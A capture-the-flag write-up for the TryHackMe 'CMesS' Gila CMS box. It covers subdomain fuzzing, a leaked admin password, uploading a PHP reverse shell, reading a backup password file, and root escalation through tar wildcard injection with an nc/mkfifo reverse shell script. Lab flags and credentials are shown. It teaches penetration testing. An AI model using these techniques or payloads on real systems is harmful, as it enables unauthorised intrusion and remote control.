TryHackMe-CMesS

From aldeid
Jump to navigation Jump to search

CMesS

Can you root this Gila CMS box?

Please add 10.10.38.29 cmess.thm to /etc/hosts

Please also note that this box does not require brute forcing!

#1 - Compromise this machine and obtain user.txt

Hint: Have you tried fuzzing for subdomains?

First thing is to add 10.10.38.29 cmess.thm in our /etc/hosts file.

Nmap reveals that 2 ports are open on the target: SSH and HTTP, on their standard ports.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_  256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Gila CMS
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There is a robots.txt file that reveals some hidden locations:

unknown@localhost:/data/documents/challenges/TryHackMe$ curl -s 10.10.38.29/robots.txt
User-agent: *
Disallow: /src/
Disallow: /themes/
Disallow: /lib/

When browsing the home page, it reveals that the website is built upon GilaCMS (https://gilacms.com/). dirsearch discovers several other hidden locations:

$ /data/src/dirsearch/dirsearch.py -u http://cmess.thm/ -E -w /data/src/wordlists/directory-list-2.3-medium.txt 

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 220529

Error Log: /data/src/dirsearch/logs/errors-20-06-18_18-54-00.log

Target: http://cmess.thm/

[18:54:00] Starting: 
[18:54:01] 200 -    4KB - /index
[18:54:01] 200 -    4KB - /
[18:54:01] 200 -    3KB - /about
[18:54:01] 200 -    4KB - /search
[18:54:01] 200 -    4KB - /blog
[18:54:01] 200 -    4KB - /1
[18:54:02] 200 -    4KB - /01
[18:54:02] 200 -    2KB - /login
[18:54:02] 200 -    4KB - /category
[18:54:02] 200 -    4KB - /0
[18:54:02] 200 -  735B  - /feed
[18:54:02] 301 -  318B  - /themes  ->  http://cmess.thm/themes/?url=themes
[18:54:03] 200 -    2KB - /admin
[18:54:04] 301 -  318B  - /assets  ->  http://cmess.thm/assets/?url=assets
[18:54:04] 403 -  274B  - /.hta
[18:54:05] 200 -    4KB - /tag
[18:54:05] 200 -    4KB - /author
[18:54:05] 200 -    4KB - /Search
[18:54:05] 301 -  316B  - /sites  ->  http://cmess.thm/sites/?url=sites
[18:54:06] 200 -    3KB - /About
[18:54:06] 301 -  312B  - /log  ->  http://cmess.thm/log/?url=log
[18:54:07] 200 -    4KB - /Index
[18:54:07] 200 -    3KB - /tags
[18:54:07] 200 -    4KB - /1x1
[18:54:07] 301 -  312B  - /lib  ->  http://cmess.thm/lib/?url=lib
[18:54:08] 301 -  312B  - /src  ->  http://cmess.thm/src/?url=src
[18:54:10] 200 -    0B  - /api
[18:54:15] 200 -    4KB - /001
[18:54:17] 500 -    0B  - /cm
[18:54:22] 200 -    4KB - /1pix
[18:54:24] 200 -    0B  - /fm
[18:54:24] 301 -  312B  - /tmp  ->  http://cmess.thm/tmp/?url=tmp
[18:54:26] 200 -    4KB - /1a
[18:54:32] 200 -    4KB - /0001
[18:54:34] 200 -    4KB - /1x1transparent
[18:54:38] 200 -    4KB - /INDEX
[18:54:39] 200 -    4KB - /1px
[18:54:59] 200 -    4KB - /1d
[18:55:03] 200 -    4KB - /1_1
[18:55:17] 200 -    4KB - /Author
[REDACTED]

The most interesting locations are probably /login and /admin, but we don’t have credentials, and are instructed not to brute force the autentication.

The hint though recommends to check subdomains; let’s use wfuzz for that purpose:

$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hw 290

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://cmess.thm/
Total requests: 4997

===================================================================
ID           Response   Lines    Word     Chars       Payload                                             
===================================================================

000000019:   200        30 L     104 W    934 Ch      "dev"                                               

Total time: 68.70782
Processed Requests: 4997
Filtered Requests: 4996
Requests/sec.: 72.72825

We have discovered a hidden dev.cmess.thm subdomain. Let’s add it to our /etc/hosts file:

$ cat /etc/hosts
[REDACTED]
10.10.38.29 cmess.thm
10.10.38.29 dev.cmess.thm

Now, let’s see what we can get from this subdomain:

$ curl -s dev.cmess.thm | html2text
***** Development Log *****
**** [email protected] ****
Have you guys fixed the bug that was found on live?

**** [email protected] ****
Hey Andre, We have managed to fix the misconfigured .htaccess file, we're
hoping to patch it in the upcoming patch!

**** [email protected] ****
Update! We have had to delay the patch due to unforeseen circumstances

**** [email protected] ****
That's ok, can you guys reset my password if you get a moment, I seem to be
unable to get onto the admin panel.

**** [email protected] ****
Your password has been reset. Here: KPFTN_f2yxe%

We are provided with an email address and a password. Now you can log in:

Once logged in, go to Content > File Manager.

Now, downlaod a PHP shell (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz), add a file named shell.php in the assets directory and put the content of the PHP reverse shell (don’t forget to modify your IP and port).

Open a listener on your machine (rlwrap nc -nlvp 4444), on the port you selected, and browse http://cmess.thm/assets/shell.php. You should now be logged in as www-data.

Lateral move to Andre

If you list the /home folder, you’ll notice that andre is a user. Let’s try a lateral move. After searching a bit (you can use linenum or linpeas to help), you’ll notice that Andre’s password has been backup’ed in a hidden file under the /opt directory:

www-data@cmess:/opt$ cat /opt/.password.bak
cat /opt/.password.bak
andres backup password
UQfsdCB7aAP6
www-data@cmess:/opt$ 

Connect to SSH with andre:UQfsdCB7aAP6 and get the user flag.

andre@cmess:~$ cat user.txt 
thm{c529b5d5d6ab6b430b7eb1903b2b5e1b}

User flag: thm{c529b5d5d6ab6b430b7eb1903b2b5e1b}

#2 - Escalate your privileges and obtain root.txt

Now, let’s get root. There is an interesting crontab job running every 2 minutes, executed by root:

*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

As you can see, this command is using the wildcard (*) to select all files located under /home/andre/backup and compress them with tar. Having a look at GTFOBins (https://gtfobins.github.io/gtfobins/tar/) tells us that we can take advantage from this mistake.

Indeed, because of the wildcard, we can create files that will be interpreted as options for the tar command, to ultimately execute something similar to this:

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Let’s do it:

$ cat > /home/andre/backup/rev << EOF
#!/bin/bash
rm /tmp/f
mkfifo /tmp/f
cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.54 4444 >/tmp/f
EOF
$ echo "" > "/home/andre/backup/--checkpoint=1"
$ echo "" > "/home/andre/backup/--checkpoint-action=exec=sh rev"

Now, let’s open a listener and wait for the next batch.

$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.185.45.
Ncat: Connection from 10.10.185.45:52344.
/bin/sh: 0: can't access tty; job control turned off
# cat /root/root.txt
thm{9f85b7fdeb2cf96985bf5761a93546a2}

Root flag: thm{9f85b7fdeb2cf96985bf5761a93546a2}

Comments

Keywords: ctf tryhackme gila cms